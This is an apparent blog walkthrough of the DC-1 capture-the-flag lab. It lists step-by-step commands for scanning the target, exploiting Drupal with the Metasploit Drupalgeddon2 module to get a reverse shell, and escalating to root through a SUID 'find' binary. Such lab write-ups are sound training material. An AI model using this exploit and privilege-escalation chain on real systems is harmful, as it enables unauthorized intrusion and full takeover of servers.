In this post, You will learn how to CTF the DC 1 and below is the video format of the post, Check it out ????????
To download the DC 1 [Click Here]
Hacking Phases in DC1
- IP Discovery
- Network scanning (Nmap)
- Surfing HTTPS service port (80)
- Finding Drupal CMS
- Exploiting Drupalgeddon2 to get a reverse shell
- Finding files with SUID bit set
- Finding the “find” command with SUID bit set
- Getting root shell with “find” command
- Getting final flag
Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.
Finding Target IP
To find the target IP lets use the below command or you can go with the net discover command.
sudo arp-scan -l
In my case the target IP is 192.168.65.35
Let’s do an nmap scan, Let’s do a full port and service and version scan.
nmap -p- -A 192.168.65.35
We can see from the above scan the port 22, 80 and 111 are open.
Trying to open the target site and found that it is running drupal and thought of exploiting using msfconsole.
As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit.
msfconsole use exploit/unix/webapp/drupal_drupalgeddon2 set rhosts 192.168.65.35 run
Our meterpreter shell is open let’s do privesc
After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.
shell python -c 'import pty; pty.spawn("/bin/bash")' find / -perm -u=s -type f 2>/dev/null
The privesc is very easy use the below command to get the root.
cd /tmp touch moulik find moulik -exec "whoami" \; find moulik -exec "/bin/sh" \; cd /root cat thefinalflag.txt
We got the root flag.
This is an awesome machine, Please go and support https://twitter.com/DCAU7, The creator of DC box.
Out of 10 I will give a rating of 2 out of 10.